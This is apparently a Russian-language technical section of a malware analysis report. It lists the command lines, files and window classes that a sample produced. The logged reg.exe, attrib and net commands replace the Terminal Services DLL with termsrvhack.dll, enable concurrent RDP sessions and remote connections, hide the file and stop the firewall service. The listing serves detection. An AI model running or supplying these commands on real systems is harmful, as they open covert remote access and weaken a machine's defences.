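Техническая информация
Ниже перечислены зафиксированные артефакты: сначала запущенные процессы с параметрами командной строки, затем пути к файлам и, по-видимому, классы окон, поиск которых выполнялся; подзаголовки разделов в этом фрагменте не сохранились, поэтому назначение отдельных групп строк следует уточнять по исходному отчёту. Последовательность `" "` в путях реестра — по всей видимости, пробел в кавычках из исходной командной строки (разделы `Terminal Server` и `Windows NT`). Для обнаружения наиболее показательны: значение ServiceDll службы TermService, указывающее на termsrvhack.dll вместо штатной библиотеки, установка EnableConcurrentSessions=1 и fDenyTSConnections=0, а также остановка службы sharedaccess.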
- '%WINDIR%\devcon.exe' install %WINDIR%\inf\machine.inf root\rdpdr
- '%WINDIR%\3.exe'
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrvhack.dll /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrvhack.dll
- '<SYSTEM32>\runonce.exe' -r
- '<SYSTEM32>\svchost.exe' -k DComLaunch
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\cmd.exe' /c "%CommonProgramFiles%\3.bat"
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\ntsd.exe' -c q -p 844
- '<SYSTEM32>\findstr.exe' /i "TermService" 111111.txt
- <SYSTEM32>\svchost.exe
- %WINDIR%\111111.txt
- %WINDIR%\222222.txt
- <SYSTEM32>\termsrvhack.dll
- %CommonProgramFiles%\3.bat
- %WINDIR%\termsrvhack.dll
- %WINDIR%\3.exe
- %WINDIR%\devcon.exe
- <SYSTEM32>\termsrvhack.dll
- ClassName: 'MS_WINHELP' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'